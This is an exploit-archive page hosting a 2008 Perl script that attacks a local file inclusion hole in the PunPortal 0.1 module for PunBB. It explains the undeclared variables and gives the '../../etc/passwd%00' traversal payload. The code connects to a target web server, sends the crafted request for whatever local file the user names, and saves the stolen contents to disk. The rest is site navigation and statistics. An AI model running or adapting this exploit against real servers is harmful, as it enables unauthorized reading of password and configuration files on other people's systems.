punportal-lfi.txt

punportal-lfi.txt: Posted Nov 20, 2008; Authored by StAkeR; PunPortal PunBB module version 0.1 local file inclusion exploit.; tags | exploit, local, file inclusion; SHA-256 | 63e5162517b423113437d76ce37e4881551e54e731e0b89b6f220564e426d437; Download | Favorite | View

punportal-lfi.txt

#!/usr/bin/perl

=about

    PunBB (PunPortal 0.1) Local File Inclusion Exploit
    --------------------------------------------------
    by athos - staker[at]hotmail[dot]it
    download mod http://www.punres.org/download.php?id=1108
    download cms http://punbb.org

    register globals = 1
    magic quotes gcp = 1
    
  
    
    File (include/login.php)
    
    1. <?php
    2.
    3. // Show login if not logged in
    4. if($pun_user['is_guest'])
    5. {
    6. if(!isset($focus_element) || (isset($focus_element) && !in_array('login', $focus_element)))
    7. {
    8. 
    9. // Load the language files
    10. require PUN_ROOT.'lang/'.$pun_user['language'].'/common.php';
    11. require PUN_ROOT.'lang/'.$pun_user['language'].'/login.php';
    
    
    $pun_user['is_guest'] isn't declared
    $pun_user['language'] isn't declared
    
    include/user/login.php?pun_user[is_guest]=a&pun_user[language]=../../etc/passwd%00
    
    how to fix?use the latest version (2.0) 
     
    Usage: perl punbb.pl localhost/cms
    
=cut


use strict;
use warnings;
use IO::Socket;


my $html = undef;
my $site = $ARGV[0] or &help;
my @take = split /\//,$site;

my ($host,$path) = @take;

if($site =~ /http:\/\/(.+?)/i) {
  print STDOUT "Invalid URL\n";
  exit;
}

print STDOUT "Local File (ex: ../../etc/passwd)\n";
print STDOUT "Local File: ";
  
chomp(my $file = <STDIN>);

if(not defined($file)) {
  print STDOUT "File Not Defined!\n";
  exit;
}


my $evil = "/include/user/login.php?pun_user[is_guest]=a&pun_user[language]=";

my $sock = new IO::Socket::INET(
                                 PeerAddr => $host,
                                 PeerPort => 80,
                                 Proto    => 'tcp',
                                 Timeout  => 6,
                              ) or die $!;   

my $data = "GET /${path}/${evil}${file}%00 HTTP/1.1\r\n".
           "Host: $host\r\n".
           "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n".
           "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n".
           "Accept-Language: en-us,en;q=0.5\r\n".
           "Accept-Encoding: gzip,deflate\r\n".
           "Connection: close\r\n\r\n";

$sock->send($data);

while(<$sock>) {
  $html .= $_;
}           

if($html =~ /(No such file or directory|HTTP\/1.1 404 Not Found)/i) {
  print STDOUT "Exploit Failed!\n";
  exit;
}
else {
  my $name = int(rand(999)).'.txt';
  
  open(FILE,">",$name);
  print FILE $html;
  close(FILE);
  
  print STDOUT "Exploit Successfully!\n";
  print STDOUT "$name saved!\n";
  exit;
}


sub help {
  print STDOUT "PunBB (PunPortal 0.1) Local File Inclusion Exploit\n".
               "by athos - staker[at]hotmail[dot]it\n".
               "Usage: perl $0 [host/path]\n";
  exit;
}

Top Authors In Last 30 Days

Red Hat 229 files
indoushka 167 files
Jay Turla 150 files
Ubuntu 67 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

punportal-lfi.txt

punportal-lfi.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

punportal-lfi.txt

Share This

punportal-lfi.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems